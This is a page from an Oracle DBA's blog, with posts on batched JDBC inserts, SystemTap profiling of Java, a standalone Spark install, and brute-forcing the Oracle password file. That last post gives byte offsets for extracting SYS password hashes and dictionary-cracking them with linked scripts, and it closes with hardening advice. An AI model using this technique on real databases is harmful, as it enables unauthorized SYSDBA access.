Oracle … as usual

Oracle by Laurent Leturgez

Category Archives: Development

Insert data in Oracle with Java … Batched mode.

Problem / Context

Today, I worked on a performance issue at my customer. The context is a Java app which did a processing and at the end of this processing, the application inserts tons of data on an Oracle database.

The customers was complaining about slow performance on the insertion phase and asked me to have a look on it.

Database was IO Bound, and many sessions were doing some one-row inserts on various tables (INSERT INTO … VALUES (:1, :2, …) ). These one-row insert were off course processed many times, and oracle session’s stats was reporting a high number of executions.

On the Java side

As an Oracle DBA or Developer, we all know that, with PLSQL, it’s easy to write a FORALL loop that will bulk insert the data, and then reduce execution time. To do that, you need to have a cursor which is read in bulkl (BULK COLLECT) and each part is then inserted in the database. This reduces the number of operations, loops etc.


DECLARE
CURSOR s_cur IS
SELECT *
FROM servers;

TYPE fetch_array IS TABLE OF s_cur%ROWTYPE;
s_array fetch_array;
BEGIN
OPEN s_cur;
LOOP
FETCH s_cur BULK COLLECT INTO s_array LIMIT 1000;

FORALL i IN 1..s_array.COUNT
INSERT INTO servers2 VALUES s_array(i);

EXIT WHEN s_cur%NOTFOUND;
END LOOP;
CLOSE s_cur;
COMMIT;
END;
/

Source: http://psoug.org/snippet/FORALL-Insert_499.htm

In Java, the problem can be different because the data processed by your app are not necesseraly coming from a database.

Usually, statements are prepared, variables are attached and the statement is executed. When it’s done in a loop, it looks something like that:


try{
         DriverManager.registerDriver (new oracle.jdbc.driver.OracleDriver());
         Connection c = DriverManager.getConnection ("jdbc:oracle:thin:@192.168.99.8:1521:orcl","laurent","laurent");
         PreparedStatement stmt = c.prepareStatement("insert into emp(employee_id,first_name,last_name,salary) values (?,?,?,?)");
         start=System.currentTimeMillis();

         for (int i=0 ; i < 50000 ; i++) {
                  stmt.setInt(1,i);
                  stmt.setString(2,generateRandomChars("01234567890ABCDEF",16));
                  stmt.setString(3,generateRandomChars("01234567890ABCDEF",16));
                  stmt.setInt(4,r.nextInt(10000+1)+5000);
                  stmt.executeUpdate();
         }
         stop=System.currentTimeMillis();
         System.out.println("time = "+(stop-start));
         stmt.close();
         c.close();
   }
   catch(Exception e){
      System.err.println(e);
      e.printStackTrace();
   }

The problem is the statement is sent to the database 50000 times, and then increase number of operation between the database and the application. As a result, execution time is high (this demo has been executed on a VM on my laptop):

[oracle@oel6 JAVA]$ time java -cp $CLASSPATH:ojdbc7.jar:. TestNoBatchedInsert
time = 75430

real    1m16.514s
user    0m5.279s
sys     0m1.080s

As for PLSQL, there is a technique to write a beautiful and powerful java code that will process inserts by batchs, and then reduce the number of loops, calls between database and application etc.

To do that, instead of using executeStatement method X times, we can use the addBatch method that will create a “batch” which will be executed on the database when PreparedStatement’s method “executeBatch” will be called.

If you’re familiar with FORALL in PLSQL, you probably know that, the more the batchsize is big, the more memory you will use. In Java, it will be the same and the result will be a bigger heap size, that’s why it’s recommended to define a batch size and each time your batch will reach a max size, the batch will be executed. This can be done like this:

try{
        DriverManager.registerDriver (new oracle.jdbc.driver.OracleDriver());
        Connection c = DriverManager.getConnection ("jdbc:oracle:thin:@192.168.99.8:1521:orcl","laurent","laurent");
        PreparedStatement stmt = c.prepareStatement("insert into emp(employee_id,first_name,last_name,salary) values (?,?,?,?)");
        start=System.currentTimeMillis();

        int batchSize=5000;
        int count=0;
        for (int i=0 ; i < 50000 ; i++) {
                stmt.setInt(1,i);
                stmt.setString(2,generateRandomChars("01234567890ABCDEF",16));
                stmt.setString(3,generateRandomChars("01234567890ABCDEF",16));
                stmt.setInt(4,r.nextInt(10000+1)+5000);
                stmt.addBatch();

                if (++count % batchSize == 0) {
                        stmt.executeBatch();
                }
        }

        stop=System.currentTimeMillis();
        System.out.println("time = "+(stop-start));
        stmt.close();
        c.close();
}
catch(Exception e){
  System.err.println(e);
  e.printStackTrace();
}

Now, if I run this program, wall time is not really the same scale:

[oracle@oel6 JAVA]$ time java -cp $CLASSPATH:ojdbc7.jar:. TestBatchedInsert
time = 598

real    0m1.964s
user    0m3.393s
sys     0m0.269s

On the database side

AWR Reports show many things:

  • First,  if we run the java sample codes as they are described, the no batch mode will commit the database after each execute update. As a result, log file switch event will increase:

Non batched inserts:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                           Total Wait       Wait   % DB Wait
Event                                Waits Time (sec)    Avg(ms)   time Class
------------------------------ ----------- ---------- ---------- ------ --------
log file sync                       49,999         64       1.28   86.8 Commit
DB CPU                                            9.3              12.6
db file sequential read                 47          0       0.97     .1 User I/O
SQL*Net message to client           50,012          0       0.00     .1 Network
log file switch completion               1          0      27.60     .0 Configur
undo segment extension                   2          0       5.16     .0 Configur
direct path write                        3          0       1.08     .0 User I/O
direct path sync                         1          0       3.15     .0 User I/O
Disk file operations I/O                19          0       0.04     .0 User I/O
control file sequential read           194          0       0.00     .0 System I

Batched inserts:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                           Total Wait       Wait   % DB Wait
Event                                Waits Time (sec)    Avg(ms)   time Class
------------------------------ ----------- ---------- ---------- ------ --------
DB CPU                                             .3              72.9
SQL*Net more data from client          268          0       0.17   10.1 Network
log file sync                           13          0       3.29    9.5 Commit
db file sequential read                 49          0       0.37    4.0 User I/O
Disk file operations I/O                17          0       0.03     .1 User I/O
control file sequential read           134          0       0.00     .1 System I
SQL*Net more data to client             10          0       0.02     .1 Network
SQL*Net message to client               22          0       0.00     .0 Network
log file single write                    0          0                .0 System I
asynch descriptor resize                 0          0                .0 Other
  • Then, due to batched process, number of buffer gets is reduced when batched inserts are used

Non batched inserts:

Segments by Logical Reads                   DB/Inst: ORCL/orcl  Snaps: 200-201
-> Total Logical Reads:         212,288
-> Captured Segments account for   28.4% of Total
-> When ** MISSING ** occurs, some of the object attributes may not be available

                     Tablespace
Owner                   Name
-------------------- ----------
                     Subobject  Obj.                             Logical
Object Name            Name     Type        Obj#   Dataobj#        Reads  %Total
-------------------- ---------- ----- ---------- ---------- ------------ -------
LAURENT              USERS
EMP                             TABLE      93857      93860       52,576   24.77

Batched inserts:
Segments by Logical Reads                   DB/Inst: ORCL/orcl  Snaps: 201-202
-> Total Logical Reads:          11,792
-> Captured Segments account for   83.0% of Total
-> When ** MISSING ** occurs, some of the object attributes may not be available

                     Tablespace
Owner                   Name
-------------------- ----------
                     Subobject  Obj.                             Logical
Object Name            Name     Type        Obj#   Dataobj#        Reads  %Total
-------------------- ---------- ----- ---------- ---------- ------------ -------
LAURENT              USERS
EMP                             TABLE      93857      93860        3,504   29.72
  • Same for buffer gets. Execution number is less for batched inserts (number of execution depends on your batch size)

Non batched inserts:

     Buffer                 Gets              Elapsed
      Gets   Executions   per Exec   %Total   Time (s)  %CPU   %IO    SQL Id
----------- ----------- ------------ ------ ---------- ----- ----- -------------
    152,587      50,000          3.1   71.9        2.1  11.3     0 7c9ws5uvx9nyc
Module: JDBC Thin Client
insert into emp(employee_id,first_name,last_name,salary) values (:1 ,:2 ,:3 ,:4
)

Batched inserts:

     Buffer                 Gets              Elapsed
      Gets   Executions   per Exec   %Total   Time (s)  %CPU   %IO    SQL Id
----------- ----------- ------------ ------ ---------- ----- ----- -------------
      3,669          10        366.9   31.1        0.1    57     0 7c9ws5uvx9nyc
Module: JDBC Thin Client
insert into emp(employee_id,first_name,last_name,salary) values (:1 ,:2 ,:3 ,:4)

 

When developer have to insert tons on data from a java app, it’s better when they used the best way to do it …. batched inserts have to be used in that case, it will help the database to be more powerful.

That’s it for today 😉

Advertisements

Profiling Java Application with Systemtap

A couple of days ago, I read this tweet from Tanel Poder :

I’m not a JVM internals geek but I was sure there was a way to do the job without restarting the JVM, and I found some cool stuff with Systemtap.

To do this, you have to install two packages on your linux distribution: systemtap and systemtap-runtime-java (and configure correctly your user environment):

[root@spark ~]# yum install systemtap systemtap-runtime-java

Please note that I used a CentOS 7.4 distribution.

Then, and for the demo, I wrote a very small piece of Java that do these steps:

  1. Prints the JVM PID
  2. Wait for a key to be pressed. During this time, you will have to execute the systemtap script I will described later.
  3. Execute a loop ten times, each loop with print a message and wait one second, and this last step is executed in a method name “loop_and_wait”.

Here’s the sample code:


package com.premiseo;

import java.lang.*;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.IOException;

class Example {
   public static void loop_and_wait(int n) throws InterruptedException{
           System.out.println("Waiting "+n+"ms... Tick");
           Thread.sleep(n);
        }

   public static void main(String[] args) {

      System.out.println("PID = "+java.lang.management.ManagementFactory.getRuntimeMXBean().getName().split("@")[0]);
      System.out.println("Press any key when ready ...");

      try {
        BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
        String next = in.readLine();
      }
      catch (IOException ioe) {
        ioe.printStackTrace();
      }

      try {
        for (int i=0;i<10;i++) {
           loop_and_wait(1000);
        }
      }
      catch (InterruptedException ie) {
        ie.printStackTrace();
      }
   }
}

Then, compile and execute … very basic I said 😉

[spark@spark java]$ javac -cp $CLASSPATH:. com/premiseo/Example.java
[spark@spark java]$ java -cp $CLASSPATH:. com.premiseo.Example
PID = 9928
Press any key when ready ...

Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick

Now, to answer to Tanel, I used a short systemtap script that will profile the program and specially the loop_and_wait method. I will count the number of times the loop_and_wait method has been called, and I will account the time spent in this method execution.

To do that, I had to write two probes related to:

  • the full name of the class, including the package name: com.premiseo.Example
  • the class name where the method is defined: Example
  • the method name I want to profile: loop_and_wait

The first one will be executed when the program will start to execute the targeted method (java(“com.premiseo.Example”).class(“Example”).method(“loop_and_wait”)), the second one will be executed when the method will return (java(“com.premiseo.Example”).class(“Example”).method(“loop_and_wait”).return)

The related systemtap script is given below:

#!/usr/bin/env stap

global counter,timespent,t

probe begin {
  printf("Press Ctrl+C to stop profiling\n")
  counter=0
  timespent=0
}

probe java("com.premiseo.Example").class("Example").method("loop_and_wait")
{
  counter++
  t=gettimeofday_ms()
}

probe java("com.premiseo.Example").class("Example").method("loop_and_wait").return
{
  timespent+=gettimeofday_ms()-t
}

probe end {
   printf("Number of calls for loop_and_wait method: %ld \n",    counter)
   printf("Time Spent in method loop_and_wait: %ld msecs \n", timespent)
}

Execution of this systemtap script gave the following result (click the image for full size):

Is it dynamic? Yes, no need to restart the running JVM process you want to target. If you want to target a specific JVM process id, you can use the stap’s “-x” option, add the modify your probe definition like this:

probe java("com.premiseo.Example").class("Example").method("loop_and_wait")
{
  if (pid() == target())
    counter++
    t=gettimeofday_ms()
}

There’s a limitation, you cannot use wilcards in the java probe definition (java(“com.premiseo.Example”).class(“Example”).method(“loop*”) … for example). That would have been useful to profile a set of methods in the same class … but not possible currently.

If you want to read more about this kind of stuff, please read the following websites:

And … that’s all for today !! 😉

 

 

Brute forcing the Oracle Password file

If you want to remotely connect to your Oracle instance as sysdba, by default (ie. remote_login_passwordfile=EXCLUSIVE), you will probably use the password file (located in $ORACLE_HOME/dbs) to identify the SYS user.

Below, I used auditd to show that the password file is read by the server process when connecting remotely:

[oracle@oel6 ~]$ sudo service auditd status
auditd (pid  2422) is running...

[oracle@oel6 ~]$ sudo auditctl -l
No rules

[oracle@oel6 ~]$ sudo auditctl -w $ORACLE_HOME/dbs/orapworcl -p r
[oracle@oel6 ~]$ sudo auditctl -l
-w /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl -p r
[oracle@oel6 ~]$ sqlplus sys@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 09:14:52 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

[oracle@oel6 ~]$ sudo ausearch -f $ORACLE_HOME/dbs/orapworcl | grep -A 2 '^type=PATH'
type=PATH msg=audit(1513326435.361:310): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:310):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:310): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:311): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:311):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:311): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:312): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:312):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:312): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=7ffe8aaf9c70 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:313): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:313):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:313): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:314): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:314):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:314): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:315): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:315):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:315): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:316): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:316):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:316): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:317): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:317):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:317): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
[oracle@oel6 ~]$ ps -ef | grep 7840
oracle    7840     1  0 09:27 ?        00:00:00 oracleorcl (LOCAL=NO)

So, if we have a closer look to this binary file, we can find various password hashes. In my example, I configured my sqlnet with SQLNET.ALLOWED_LOGON_VERSION_SERVER=11. As a result, my password file contains 10g, 11g and 12c password hashes for the SYS user.

Below, I used xxd linux command with specific offsets on my password file to get the password hashes (in bold in the output):

  • 10g sys password hash
[oracle@oel6 ~]$ xxd -c16 -g0 -s +0x0484 -l 16 $ORACLE_HOME/dbs/orapworcl
0000484: 32363235343335323638333944303441 262543526839D04A
  • 11g sys password hash
[oracle@oel6 ~]$ xxd -c30 -g0 -s +0x04ac -l 30 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314 *.....o3.I..H.......>.....^.S.

First part (20 first bytes): SHA1 digest

[oracle@oel6 ~]$ xxd -c20 -g0 -s +0x04ac -l 20 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f9 *.....o3.I..H.......

Second part (10 next bytes): Salt used by Oracle

[oracle@oel6 ~]$ xxd -c10 -g0 -s +0x4C0 -l 10 $ORACLE_HOME/dbs/orapworcl
00004c0: 3ef3c5da13ca5eb95314 >.....^.S.
  • 12c sys password hash
[oracle@oel6 ~]$ xxd -c80 -g0 -s +0x04CA -l 80 $ORACLE_HOME/dbs/orapworcl
00004ca: ad84face7a337c03baacca0bc63f97068e51edd0d6c53826ce8c347594a2800f92c736b4c83239fa47414ff2f68f45304b016ae215ed595c8b71c3c5a0ca3a0630e931d0f7d3929c9a6fb131f2fa0427 ....z3|......?...Q....8&..4u......6..29.GAO...E0K.j...Y\.q....:.0.1......o.1...'

Note: if you use the default configuration of oracle 12.2, you will only find 11g and 12c hashes.

 

Once these hashes have been found, I wrote some python scripts to brute force with a dictionary file to guess the password. Those scripts are available at this URL: https://github.com/lolo115/oracrack

First of all, I used the ora10g_hash_bf.py against the 10g hash to find the case insensitive password:

[oracle@oel6 sec]$ ./ora10g_hash_bf.py dict.txt sys 262543526839D04A
DICTFILE = dict.txt
USERNAME = sys
HASH     = 262543526839D04A
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: rockyou
------
Be careful, the found password is case insensitive. The real password can include upper character(s)
Now generate all combinations for this password and run ora11g_hash_bf.py script to find the case sensitive password

Ok, the password is weak and the program found it in the dictionary file, but if we try it on our database, it fails because I used a sqlplus 12.2 client that use case sensitive passwords (and my SQLNET client configuration is the default one):

$ sqlplus sys/rockyou@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:06:37 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

ERROR:
ORA-01017: invalid username/password; logon denied

So, now as I know that the sys password is something like “rockyou” with upper and lower characters in it, I will use my “gen_all_comb.py” script to generate my own dictionary file that will contains all the combination for the “rockyou” password:

[oracle@oel6 sec]$ ./gen_all_comb.py rockyou > mydict.txt
[oracle@oel6 sec]$ head mydict.txt
rockyou
rockyoU
rockyOu
rockyOU
rockYou
rockYoU
rockYOu
rockYOU
rocKyou
rocKyoU
.../...

As the last operation, I have to use the ora11g_hash_bf.py script against the 11g hash (which is case sensitive) with my previously generated dictionary (mydict) and the script will find the correct password:

[oracle@oel6 sec]$ ./ora11g_hash_bf.py mydict.txt sys 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
DICTFILE = mydict.txt
USERNAME = sys
HASH     = 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: RocKyoU

So let’s try:

[oracle@oel6 sec]$ sqlplus sys/RocKyoU@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:12:17 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL>

In this blog post, I described how to brute force SYS password that is stored in the password file without trying to connect number of times to the database and lock account etc. Please note that, I didn’t read at any time the USER$ table too.

To avoid this, you can simply disable password file usage by setting remote_login_passwordfile to NONE and remove this password file. You can set a SYS password  that is not weak (or use a password function with a profile etc.), there are too many customers that are still setting sys password to oracle, oracle123 or welcome1 ….

Finally, I didn’t write anything about the 12c hash (SHA512) because it’s a bit more complicated. Oracle 12c used a SCRAM authentication dialog, so first, you have to listen to the client/server network dialog, get some authentication keys and then run your own script. More, the 12c hash generation process uses PBKDF2 key derivation function that is a de-optimized function. As a consequence, it will slow down the execution rate of your script. So if you want to secure your 12c authentication process and avoid password brute force, you have to use only a 12c hash password (in your password file and into USER$ table), encrypt your network dialog with AES192 algorithm (starting with 12c, it can be done even in Standard Edition), use non weak passwords.

I will terminate this blog post with the traditional disclaimer … use all that is written in this blog post (including scripts) at your own risk. If you use all this stuff to hack a SYS password without any authorization … you will be the only responsible for all the consequences ! 😉

Install a Standalone Spark Environment on Oracle Linux 7

Spark is one of the most trendy project in the Apache Fundation.

From now, I usually used it directly on hadoop clusters, but each time I had to play with spark without the need of a complete hadoop cluster, or to test some basic pieces of code … It became hard to do it, specially on my laptop !!! Running a 3 node CDH cluster on your laptop requires CPU and memory !

So in this post, I decided to write how you can setup a small linux virtual machine, and install the last spark version in standalone mode.

First, of all, you need a fully operating linux box … I chose an Oracle Enterprise linux 7.4 one with  3.8.13-118 UEK kernel.

[spark@spark ~]$ sudo uname -r
3.8.13-118.19.4.el7uek.x86_64

Once installed and configured, you need to install java. In my case, I’ve installed a jdk8 SE:

[spark@spark ~]$ sudo yum localinstall /home/spark/jdk-8u121-linux-x64.rpm -y
[spark@spark ~]$ java -version
java version "1.8.0_121"
Java(TM) SE Runtime Environment (build 1.8.0_121-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)

Then, create all the required directories for Spark installation and download sources (If you need another version of Spark, you will find following this URL: https://spark.apache.org/downloads.html) :

[spark@spark ~]$ sudo mkdir /usr/local/share/spark
[spark@spark ~]$ sudo chown spark:spark /usr/local/share/spark
[spark@spark ~]$ curl -O https://d3kbcqa49mib13.cloudfront.net/spark-2.2.0.tgz
[spark@spark ~]$ tar -xvzf spark-2.2.0.tgz -C /usr/local/share/spark/
[spark@spark ~]$ cd /usr/local/share/spark/spark-2.2.0/

If you are behind a proxy server, you have to create a settings.xml file in $HOME/.m2 directory (you’ll probably have to create it). You have to do it, even if you have set http_proxy variable in your environment (beause maven, which is used during the installation process will use it).

Below, you’ll see what my settings.xml file looks like:

[spark@spark ~]$ cat ~/.m2/settings.xml
<settings>
 <proxies>
 <proxy>
 <id>example-proxy</id>
 <active>true</active>
 <protocol>http</protocol>
 <host>10.239.9.20</host>
 <port>80</port>
 </proxy>
 </proxies>
</settings>

Then, you are ready to configure MAVEN environment and launch the installation process:

[spark@spark ~]$ cd /usr/local/share/spark/spark-2.2.0/
[spark@spark spark-2.2.0]$ export MAVEN_OPTS=-Xmx2g -XX:ReservedCodeCacheSize=512m
[spark@spark spark-2.2.0]$ ./build/mvn -DskipTests clean package

At the end of the process, a summary report is printed.

[spark@spark spark-2.2.0]$ ./build/mvn -DskipTests clean package

.../...

[INFO] Replacing original artifact with shaded artifact.
[INFO] Replacing /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0.jar with /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-shaded.jar
[INFO] Dependency-reduced POM written at: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/dependency-reduced-pom.xml
[INFO]
[INFO] --- maven-source-plugin:3.0.1:jar-no-fork (create-source-jar) @ spark-streaming-kafka-0-10-assembly_2.11 ---
[INFO] Building jar: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-sources.jar
[INFO]
[INFO] --- maven-source-plugin:3.0.1:test-jar-no-fork (create-source-jar) @ spark-streaming-kafka-0-10-assembly_2.11 ---
[INFO] Building jar: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-test-sources.jar
[INFO] ------------------------------------------------------------------------
[INFO] Reactor Summary:
[INFO]
[INFO] Spark Project Parent POM ........................... SUCCESS [01:04 min]
[INFO] Spark Project Tags ................................. SUCCESS [ 26.598 s]
[INFO] Spark Project Sketch ............................... SUCCESS [ 6.316 s]
[INFO] Spark Project Networking ........................... SUCCESS [ 17.129 s]
[INFO] Spark Project Shuffle Streaming Service ............ SUCCESS [ 6.836 s]
[INFO] Spark Project Unsafe ............................... SUCCESS [ 9.039 s]
[INFO] Spark Project Launcher ............................. SUCCESS [ 21.286 s]
[INFO] Spark Project Core ................................. SUCCESS [02:24 min]
[INFO] Spark Project ML Local Library ..................... SUCCESS [ 20.021 s]
[INFO] Spark Project GraphX ............................... SUCCESS [ 13.117 s]
[INFO] Spark Project Streaming ............................ SUCCESS [ 33.581 s]
[INFO] Spark Project Catalyst ............................. SUCCESS [01:22 min]
[INFO] Spark Project SQL .................................. SUCCESS [02:56 min]
[INFO] Spark Project ML Library ........................... SUCCESS [02:08 min]
[INFO] Spark Project Tools ................................ SUCCESS [ 3.084 s]
[INFO] Spark Project Hive ................................. SUCCESS [ 51.106 s]
[INFO] Spark Project REPL ................................. SUCCESS [ 4.365 s]
[INFO] Spark Project Assembly ............................. SUCCESS [ 2.109 s]
[INFO] Spark Project External Flume Sink .................. SUCCESS [ 8.062 s]
[INFO] Spark Project External Flume ....................... SUCCESS [ 9.350 s]
[INFO] Spark Project External Flume Assembly .............. SUCCESS [ 2.087 s]
[INFO] Spark Integration for Kafka 0.8 .................... SUCCESS [ 12.043 s]
[INFO] Kafka 0.10 Source for Structured Streaming ......... SUCCESS [ 12.758 s]
[INFO] Spark Project Examples ............................. SUCCESS [ 19.236 s]
[INFO] Spark Project External Kafka Assembly .............. SUCCESS [ 5.637 s]
[INFO] Spark Integration for Kafka 0.10 ................... SUCCESS [ 9.345 s]
[INFO] Spark Integration for Kafka 0.10 Assembly .......... SUCCESS [ 3.909 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 14:54 min
[INFO] Finished at: 2017-09-14T12:22:31+02:00
[INFO] Final Memory: 86M/896M
[INFO] ------------------------------------------------------------------------

At this step, if you run some scripts, you’ll throw an error because, even if you have installed spark in standalone, you need hadoop librairies.

It’s an easy thing to do, we just have to download hadoop and configure our environment that way (Please download the hadoop version you need, I chose 2.8 which is the latest stable version for hadoop2, I didn’t make the test with hadoop3 as it’s still in beta):

[spark@spark ~]$ cd /usr/local/share/
[spark@spark share]$ sudo mkdir hadoop
[spark@spark share]$ sudo chown spark:spark hadoop/
[spark@spark share]$ cd hadoop/
[spark@spark hadoop]$ curl -O http://apache.mirrors.ovh.net/ftp.apache.org/dist/hadoop/common/hadoop-2.8.1/hadoop-2.8.1.tar.gz
[spark@spark hadoop]$ tar -xzf hadoop-2.8.1.tar.gz
[spark@spark hadoop]$ cat >> ~/.bashrc
export HADOOP_HOME=/usr/local/share/hadoop/hadoop-2.8.1
export LD_LIBRARY_PATH=${HADOOP_HOME}/lib/native:${LD_LIBRARY_PATH}
export SPARK_HOME=/usr/local/share/spark/spark-2.2.0
export PATH=${SPARK_HOME}/bin:${PATH}
[spark@spark hadoop]$ . ~/.bashrc
[spark@spark hadoop]$ env | egrep 'HADOOP|PATH|SPARK'
SPARK_HOME=/usr/local/share/spark/spark-2.2.0
HADOOP_HOME=/usr/local/share/hadoop/hadoop-2.8.1
LD_LIBRARY_PATH=/usr/local/share/hadoop/hadoop-2.8.1/lib/native:/usr/local/share/hadoop/hadoop-2.8.1/lib/native:
